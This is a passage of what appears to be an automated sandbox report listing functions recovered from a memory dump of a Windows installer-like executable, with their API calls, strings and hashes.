??3@YAXPEAX@Z.MSVCRT(?,?,000000014001B0C2), ref: 000000014001B029

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: memcpy$??3@$??2@
String ID:
API String ID: 3516945703-0
Opcode ID: 20c755d16aa4bf91e3a19b48a693d9da88bd2ae10b30367354b1751bf6518cb6
Instruction ID: cf4f8c7fb012e33594a7d47d355e787bf860c74e0a18c5e7f084cb80daf98719
Opcode Fuzzy Hash: 20c755d16aa4bf91e3a19b48a693d9da88bd2ae10b30367354b1751bf6518cb6
Instruction Fuzzy Hash: 9151BD7270064096EB228F67E484BEE67A5F74DBC4F854126EF4C4B766EB3AC5068300

Function 0000000140014DD8 Relevance: 9.1, APIs: 6, Instructions: 58COMMON

Download Yara Rule

APIs

_CxxThrowException.MSVCRT ref: 0000000140014E10
_CxxThrowException.MSVCRT ref: 0000000140014E40
??2@YAPEAX_K@Z.MSVCRT(?,?,?,?,0000000140014F39,?,?,?,?,000000014000467A), ref: 0000000140014E50
_CxxThrowException.MSVCRT ref: 0000000140014E71
memcpy.MSVCRT ref: 0000000140014E8F
??3@YAXPEAX@Z.MSVCRT(?,?,?,?,0000000140014F39,?,?,?,?,000000014000467A), ref: 0000000140014E98

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: ExceptionThrow$??2@??3@memcpy
String ID:
API String ID: 343384133-0
Opcode ID: f690bcb228182c14dbcc26602bf1d39fab97e79a36fb3531eb706b5a204b1e19
Instruction ID: 251288029fd6d814545ef55a40716c1e93e4fbf20d878d01e14fdd6d2e0fa8b4
Opcode Fuzzy Hash: f690bcb228182c14dbcc26602bf1d39fab97e79a36fb3531eb706b5a204b1e19
Instruction Fuzzy Hash: BB216D72211B8481EB09DF26D4803E8B7A5F78CBC4F548416EB1D5B7BADB79C982C740

Function 000000014000746C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 113COMMON

Download Yara Rule

APIs

??3@YAXPEAX@Z.MSVCRT ref: 0000000140007518
??3@YAXPEAX@Z.MSVCRT ref: 00000001400075E9
??3@YAXPEAX@Z.MSVCRT ref: 0000000140007604

Strings

;!@Install@!UTF-8!, xrefs: 000000014000758B
;!@InstallEnd@!, xrefs: 00000001400075AD

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: ??3@
String ID: ;!@Install@!UTF-8!$;!@InstallEnd@!
API String ID: 613200358-372238525
Opcode ID: ba87d413b51fb84e4b59b4bb6ab10b4812675b42b2860b74db798402a4b1df6c
Instruction ID: 076db66685e813d8d3cd1b4408f64ac1fb14b56a106a12c9e1af531cca41882b
Opcode Fuzzy Hash: ba87d413b51fb84e4b59b4bb6ab10b4812675b42b2860b74db798402a4b1df6c
Instruction Fuzzy Hash: 92513972618A8482EB22DF12E4513EAA7A0F7997D4F540215FB8D4B6AADB3DC605CB00

Function 000000014000B144 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 0000000140001190: ??2@YAPEAX_K@Z.MSVCRT(?,?,?,000000014000AEED,?,?,?,000000014000C6C2), ref: 00000001400011C3
Part of subcall function 0000000140001190: ??3@YAXPEAX@Z.MSVCRT(?,?,?,000000014000AEED,?,?,?,000000014000C6C2), ref: 00000001400011F8

wsprintfW.USER32 ref: 000000014000B1BB
GetDlgItem.USER32 ref: 000000014000B1DC
SetWindowTextW.USER32 ref: 000000014000B1EB
??3@YAXPEAX@Z.MSVCRT ref: 000000014000B1FC

Strings

(%d%s), xrefs: 000000014000B1AC

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: ??3@$??2@ItemTextWindowwsprintf
String ID: (%d%s)
API String ID: 19352476-2087557067
Opcode ID: 91a4cb156418712f142d02a16fbac192e066cee43a3a92aaca2c1be05a4db6d3
Instruction ID: bf222e68f35a76b031a8f0e99b83192b3962dc3eef2abcfa1120ff20973cd401
Opcode Fuzzy Hash: 91a4cb156418712f142d02a16fbac192e066cee43a3a92aaca2c1be05a4db6d3
Instruction Fuzzy Hash: 14213A7261464586DB21EF22F4543EA7361FB9CBC8F404125FB890BBA9DE3CC94ACB40

Function 000000014000A5C4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 000000014000A5D8
GetProcAddress.KERNEL32 ref: 000000014000A5ED
GetWindow.USER32 ref: 000000014000A621

Strings

uxtheme, xrefs: 000000014000A5D1
SetWindowTheme, xrefs: 000000014000A5E3

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: AddressLibraryLoadProcWindow
String ID: SetWindowTheme$uxtheme
API String ID: 1082215438-1369271589
Opcode ID: d90caa569c4dc83b0459c49e91b5fbbe0d300bad528571ccade65210cb2a39d4
Instruction ID: 0892ec2b5f8f95056378a950c5d512579efc54aba6643401d52d3a13ea2d8b64
Opcode Fuzzy Hash: d90caa569c4dc83b0459c49e91b5fbbe0d300bad528571ccade65210cb2a39d4
Instruction Fuzzy Hash: A7F0F470301A4191EF56DB93F8947E563A1AB9DBC0F5D9039AA4E0B7B4EE3DC9998300

Function 0000000140005F20 Relevance: 7.6, APIs: 5, Instructions: 82stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32 ref: 0000000140005F52
??3@YAXPEAX@Z.MSVCRT ref: 0000000140006010
??3@YAXPEAX@Z.MSVCRT ref: 000000014000601A
??3@YAXPEAX@Z.MSVCRT ref: 000000014000602B
??3@YAXPEAX@Z.MSVCRT ref: 0000000140006035

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: ??3@$lstrlen
String ID:
API String ID: 2031685711-0
Opcode ID: 61bf2eb809446b2d572152a20fda177439db6804f90a6e0e1c439bc51ef1e70a
Instruction ID: ad70323f6a8c741412e2200e79952b208abd6a5516909cdfef4a2f6db5847d87
Opcode Fuzzy Hash: 61bf2eb809446b2d572152a20fda177439db6804f90a6e0e1c439bc51ef1e70a
Instruction Fuzzy Hash: 7B31CEB2604A4481EB22EF22F4913EF63A1F789BC4F448022FB4A476B6DF7DC9458741

Function 000000014000B214 Relevance: 7.6, APIs: 5, Instructions: 78timeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 000000014000B27B
??3@YAXPEAX@Z.MSVCRT ref: 000000014000B2DB
GetDlgItem.USER32 ref: 000000014000B2FE
??3@YAXPEAX@Z.MSVCRT ref: 000000014000B325
SetTimer.USER32 ref: 000000014000B33B

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: ??3@Item$Timer
String ID:
API String ID: 4119539950-0
Opcode ID: 8dbbb87c90dc95c51b739d07fbf2f3a0a59703ca1f4a3bec119e197961c230f4
Instruction ID: a63ae0be2eaf2c453743e4c4373b079b57b03e8f6d4fee9bda414248858a712d
Opcode Fuzzy Hash: 8dbbb87c90dc95c51b739d07fbf2f3a0a59703ca1f4a3bec119e197961c230f4
Instruction Fuzzy Hash: 6C310A72604A4182EB22DB17F4503AAA7A1F7D8BD8F648116EB8D47775DF3CC9428B40

Function 000000014000C280 Relevance: 7.6, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 000000014000C299

Part of subcall function 00000001400021CC: GetParent.USER32 ref: 00000001400021E1
Part of subcall function 00000001400021CC: GetWindowRect.USER32 ref: 00000001400021F5
Part of subcall function 00000001400021CC: ScreenToClient.USER32 ref: 0000000140002201
Part of subcall function 00000001400021CC: ScreenToClient.USER32 ref: 000000014000220E

Part of subcall function 0000000140009F84: GetDlgItem.USER32 ref: 0000000140009F97
Part of subcall function 0000000140009F84: ShowWindow.USER32 ref: 0000000140009FAC

GetSystemDirectoryW.KERNEL32 ref: 000000014000C2F2
SHGetFileInfoW.SHELL32 ref: 000000014000C315
GetDlgItem.USER32 ref: 000000014000C32D
SetWindowLongPtrW.USER32 ref: 000000014000C342

Part of subcall function 000000014000BE00: GetModuleHandleW.KERNEL32 ref: 000000014000BE3E
Part of subcall function 000000014000BE00: LoadIconW.USER32 ref: 000000014000BE4A
Part of subcall function 000000014000BE00: GetSystemMetrics.USER32 ref: 000000014000BE57
Part of subcall function 000000014000BE00: GetSystemMetrics.USER32 ref: 000000014000BE63
Part of subcall function 000000014000BE00: GetModuleHandleW.KERNEL32 ref: 000000014000BE6D
Part of subcall function 000000014000BE00: LoadImageW.USER32 ref: 000000014000BE88
Part of subcall function 000000014000BE00: SendMessageW.USER32 ref: 000000014000BEA8
Part of subcall function 000000014000BE00: SendMessageW.USER32 ref: 000000014000BEBA
Part of subcall function 000000014000BE00: GetDlgItem.USER32 ref: 000000014000BED9
Part of subcall function 000000014000BE00: GetDlgItem.USER32 ref: 000000014000BEEB
Part of subcall function 000000014000BE00: GetWindowLongPtrW.USER32 ref: 000000014000BEFE
Part of subcall function 000000014000BE00: SetWindowLongPtrW.USER32 ref: 000000014000BF11
Part of subcall function 000000014000BE00: GetDlgItem.USER32 ref: 000000014000BF22
Part of subcall function 000000014000BE00: GetDlgItem.USER32 ref: 000000014000BF31
Part of subcall function 000000014000BE00: GetWindowLongPtrW.USER32 ref: 000000014000BF3F
Part of subcall function 000000014000BE00: SetWindowLongPtrW.USER32 ref: 000000014000BF52
Part of subcall function 000000014000BE00: GetDlgItem.USER32 ref: 000000014000BF65
Part of subcall function 000000014000BE00: SetWindowTextW.USER32 ref: 000000014000BF74

Part of subcall function 000000014000AD10: GetDlgItem.USER32 ref: 000000014000AD2B
Part of subcall function 000000014000AD10: SetFocus.USER32 ref: 000000014000AD34
Part of subcall function 000000014000AD10: GetDlgItem.USER32 ref: 000000014000AD4A
Part of subcall function 000000014000AD10: SetWindowTextW.USER32 ref: 000000014000AD59
Part of subcall function 000000014000AD10: GetDlgItem.USER32 ref: 000000014000AD77

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: Item$Window$Long$System$ClientHandleLoadMessageMetricsModuleScreenSendText$DirectoryFileFocusIconImageInfoParentRectShow
String ID:
API String ID: 1138730274-0
Opcode ID: 61d6c78218eb6317a45e8097d8a6f23d8aa33d7da5d49d6b5631f032446ee95d
Instruction ID: b63a148017210593d40ca0b968c861178b1ddd50ce58897d5ddd9e58bd0b325e
Opcode Fuzzy Hash: 61d6c78218eb6317a45e8097d8a6f23d8aa33d7da5d49d6b5631f032446ee95d
Instruction Fuzzy Hash: BB216A72700A8192EB11DB62F9443DAB361FBD8BC1F504025BF4A43BA5CF3CC9558740

Function 000000014000BCF8 Relevance: 7.5, APIs: 5, Instructions: 39threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000000014000BD14
SetWindowsHookExW.USER32 ref: 000000014000BD2A

Part of subcall function 000000014000B144: wsprintfW.USER32 ref: 000000014000B1BB
Part of subcall function 000000014000B144: GetDlgItem.USER32 ref: 000000014000B1DC
Part of subcall function 000000014000B144: SetWindowTextW.USER32 ref: 000000014000B1EB
Part of subcall function 000000014000B144: ??3@YAXPEAX@Z.MSVCRT ref: 000000014000B1FC

GetCurrentThreadId.KERNEL32 ref: 000000014000BD40
SetWindowsHookExW.USER32 ref: 000000014000BD57
EndDialog.USER32 ref: 000000014000BD85

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: CurrentHookThreadWindows$??3@DialogItemTextWindowwsprintf
String ID:
API String ID: 3524378390-0
Opcode ID: 96ff3a8907448ea7e7d5942ad81f8ab8657560436fa996fd6de5ea723de8fd05
Instruction ID: e637697b717b4d7adabf1c77aa28ec68b3cb111fe366be0d3bba24708754debd
Opcode Fuzzy Hash: 96ff3a8907448ea7e7d5942ad81f8ab8657560436fa996fd6de5ea723de8fd05
Instruction Fuzzy Hash: 75113071100A05C2EB12EF67F954BD473A1F76CBD4F105029EB1A07A75EF388894C741

Function 000000014001FB8C Relevance: 7.5, APIs: 5, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 000000014001FBC3
GetCurrentProcessId.KERNEL32 ref: 000000014001FBCE
GetCurrentThreadId.KERNEL32 ref: 000000014001FBDA
GetTickCount.KERNEL32 ref: 000000014001FBE6
QueryPerformanceCounter.KERNEL32 ref: 000000014001FBF7

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 68134717db233abe0fcbf376e0d6bb68a5f352f7fd12f8c9e61c4e0d7b0c0c4c
Instruction ID: 999c3428c13105c206d04047104b56539774967d394dcdc4b45c643832896048
Opcode Fuzzy Hash: 68134717db233abe0fcbf376e0d6bb68a5f352f7fd12f8c9e61c4e0d7b0c0c4c
Instruction Fuzzy Hash: F4018C31225A4486EB828F22E8907D66360F79DBD0F446628FF5E47BB4DB3CCD958300

Function 000000014000AD10 Relevance: 7.5, APIs: 5, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 000000014000AD2B
SetFocus.USER32 ref: 000000014000AD34
GetDlgItem.USER32 ref: 000000014000AD4A
SetWindowTextW.USER32 ref: 000000014000AD59

Part of subcall function 000000014000585C: ??3@YAXPEAX@Z.MSVCRT ref: 00000001400058B7
Part of subcall function 000000014000585C: ??3@YAXPEAX@Z.MSVCRT ref: 00000001400058C1
Part of subcall function 000000014000585C: SetWindowTextW.USER32 ref: 00000001400058CE
Part of subcall function 000000014000585C: ??3@YAXPEAX@Z.MSVCRT ref: 00000001400058DB

GetDlgItem.USER32 ref: 000000014000AD77

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: ??3@Item$TextWindow$Focus
String ID:
API String ID: 1467601455-0
Opcode ID: 23821594c8596c64eef42eef01d5d5f5d0b89be1efe43f4416cf6e3c56d12a5a
Instruction ID: ee40ff9b4ba704ae558b6c641d0b54c204ed98ad317550b1a5b894c6021ab693
Opcode Fuzzy Hash: 23821594c8596c64eef42eef01d5d5f5d0b89be1efe43f4416cf6e3c56d12a5a
Instruction Fuzzy Hash: 7601AF35605B9182EA15AB93F8543AA7361F7DCBD5F188029AF4E53B69DE3CD8828700

Function 00000001400037A4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

Part of subcall function 0000000140001190: ??2@YAPEAX_K@Z.MSVCRT(?,?,?,000000014000AEED,?,?,?,000000014000C6C2), ref: 00000001400011C3
Part of subcall function 0000000140001190: ??3@YAXPEAX@Z.MSVCRT(?,?,?,000000014000AEED,?,?,?,000000014000C6C2), ref: 00000001400011F8

Part of subcall function 0000000140002B70: ??2@YAPEAX_K@Z.MSVCRT ref: 0000000140002B8D
Part of subcall function 0000000140002B70: ??3@YAXPEAX@Z.MSVCRT ref: 0000000140002BBF

Part of subcall function 0000000140003274: MultiByteToWideChar.KERNEL32 ref: 00000001400032D9

??3@YAXPEAX@Z.MSVCRT ref: 00000001400038E1
??3@YAXPEAX@Z.MSVCRT ref: 0000000140003900
??3@YAXPEAX@Z.MSVCRT ref: 0000000140003908

Strings

X, xrefs: 000000014000390F

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: ??3@$??2@$ByteCharMultiWide
String ID: X
API String ID: 319580807-3081909835
Opcode ID: 37d8b73d4cda694d815cc8fa86ab5e5041d77350a8a1c6e6df36e47c89b5f452
Instruction ID: e3a11a9e6badfdd8c8a079c73f7c2ff90b4b6c6a3d601e721762b9fc762a96e7
Opcode Fuzzy Hash: 37d8b73d4cda694d815cc8fa86ab5e5041d77350a8a1c6e6df36e47c89b5f452
Instruction Fuzzy Hash: EC51A1B2614A8086DB62DF12E0417DEB7A9F78CBC4F508012FB8D577AADB78C951CB00

Function 000000014000B040 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 000000014000B05B

Part of subcall function 0000000140001100: SHBrowseForFolderW.SHELL32 ref: 000000014000110E

SHGetPathFromIDListW.SHELL32 ref: 000000014000B091
SHGetMalloc.SHELL32 ref: 000000014000B0C5

Part of subcall function 000000014000AD10: GetDlgItem.USER32 ref: 000000014000AD2B
Part of subcall function 000000014000AD10: SetFocus.USER32 ref: 000000014000AD34
Part of subcall function 000000014000AD10: GetDlgItem.USER32 ref: 000000014000AD4A
Part of subcall function 000000014000AD10: SetWindowTextW.USER32 ref: 000000014000AD59
Part of subcall function 000000014000AD10: GetDlgItem.USER32 ref: 000000014000AD77

Strings

A, xrefs: 000000014000B06E

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: Item$BrowseFocusFolderFromListMallocPathTextWindowmemset
String ID: A
API String ID: 1716548450-3554254475
Opcode ID: 5a52c8061c88f56462f6c6f8983384dcaa706acc257a5b6df1d51f411b7befa7
Instruction ID: 46c1a9cfd4450baac315782f80919ef9387bd64b916b3923527e6b59a0aa13df
Opcode Fuzzy Hash: 5a52c8061c88f56462f6c6f8983384dcaa706acc257a5b6df1d51f411b7befa7
Instruction Fuzzy Hash: E7111976209A8582EE61DB17F4843EAA3A1F788BC4F444125EB5D47A65DF7CC948CB00

Function 0000000140001764 Relevance: 6.1, APIs: 4, Instructions: 104synchronizationthreadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32 ref: 00000001400017E1
WaitForSingleObject.KERNEL32 ref: 0000000140001809

Part of subcall function 000000014000C7F4: wvsprintfW.USER32 ref: 000000014000C829
Part of subcall function 000000014000C7F4: GetLastError.KERNEL32 ref: 000000014000C837
Part of subcall function 000000014000C7F4: FormatMessageW.KERNEL32 ref: 000000014000C86C
Part of subcall function 000000014000C7F4: FormatMessageW.KERNEL32 ref: 000000014000C899
Part of subcall function 000000014000C7F4: lstrlenW.KERNEL32 ref: 000000014000C8A8
Part of subcall function 000000014000C7F4: lstrlenW.KERNEL32 ref: 000000014000C8B6
Part of subcall function 000000014000C7F4: ??2@YAPEAX_K@Z.MSVCRT ref: 000000014000C8D9
Part of subcall function 000000014000C7F4: lstrcpyW.KERNEL32 ref: 000000014000C8E9
Part of subcall function 000000014000C7F4: lstrcpyW.KERNEL32 ref: 000000014000C8FF
Part of subcall function 000000014000C7F4: ??3@YAXPEAX@Z.MSVCRT ref: 000000014000C910
Part of subcall function 000000014000C7F4: LocalFree.KERNEL32 ref: 000000014000C91A

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: FormatMessagelstrcpylstrlen$??2@??3@CreateErrorFreeLastLocalObjectSingleThreadWaitwvsprintf
String ID:
API String ID: 359084233-0
Opcode ID: 3622bbda2e08b7e38e83877aa52f7fa3d612acbb02162747846d26085ce9d720
Instruction ID: 09920a941ca1f851a91bc0334998cfe95e93caa460d85b4cc9561f19959564ec
Opcode Fuzzy Hash: 3622bbda2e08b7e38e83877aa52f7fa3d612acbb02162747846d26085ce9d720
Instruction Fuzzy Hash: 16413BB561460086FB2ADB57F4557E923A1F78CBD0F248129FB5947AF4CF39CA458700

Function 0000000140005D28 Relevance: 6.1, APIs: 4, Instructions: 90COMMON

Download Yara Rule

APIs

Part of subcall function 0000000140001190: ??2@YAPEAX_K@Z.MSVCRT(?,?,?,000000014000AEED,?,?,?,000000014000C6C2), ref: 00000001400011C3
Part of subcall function 0000000140001190: ??3@YAXPEAX@Z.MSVCRT(?,?,?,000000014000AEED,?,?,?,000000014000C6C2), ref: 00000001400011F8

GetTempPathW.KERNEL32 ref: 0000000140005D78
GetTempPathW.KERNEL32 ref: 0000000140005DA4
wsprintfW.USER32 ref: 0000000140005DFB
GetFileAttributesW.KERNEL32 ref: 0000000140005E2F

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: PathTemp$??2@??3@AttributesFilewsprintf
String ID:
API String ID: 51045435-0
Opcode ID: 7f09be7bd5712a3bcaae1353d953167a8e73bde6af57453d2c4b80cf29d335a7
Instruction ID: 191b355840b50b170f5699fe2469ea46b17b6c964ac9f155fbda5178bc08f6cc
Opcode Fuzzy Hash: 7f09be7bd5712a3bcaae1353d953167a8e73bde6af57453d2c4b80cf29d335a7
Instruction Fuzzy Hash: B0319DB3610A4086EB16EF26E4543AE73A1F799FD5F19C026EB0A473A5CB39C881C740

Function 000000014000AA4C Relevance: 6.1, APIs: 4, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 000000014000A118: GetDlgItem.USER32 ref: 000000014000A155
Part of subcall function 000000014000A118: GetWindowLongPtrW.USER32 ref: 000000014000A163
Part of subcall function 000000014000A118: GetDlgItem.USER32 ref: 000000014000A177
Part of subcall function 000000014000A118: GetDlgItem.USER32 ref: 000000014000A1BD
Part of subcall function 000000014000A118: GetWindowLongPtrW.USER32 ref: 000000014000A1C8
Part of subcall function 000000014000A118: GetDlgItem.USER32 ref: 000000014000A1DC
Part of subcall function 000000014000A118: GetSystemMetrics.USER32 ref: 000000014000A257
Part of subcall function 000000014000A118: GetSystemMetrics.USER32 ref: 000000014000A264
Part of subcall function 000000014000A118: GetSystemMetrics.USER32 ref: 000000014000A271
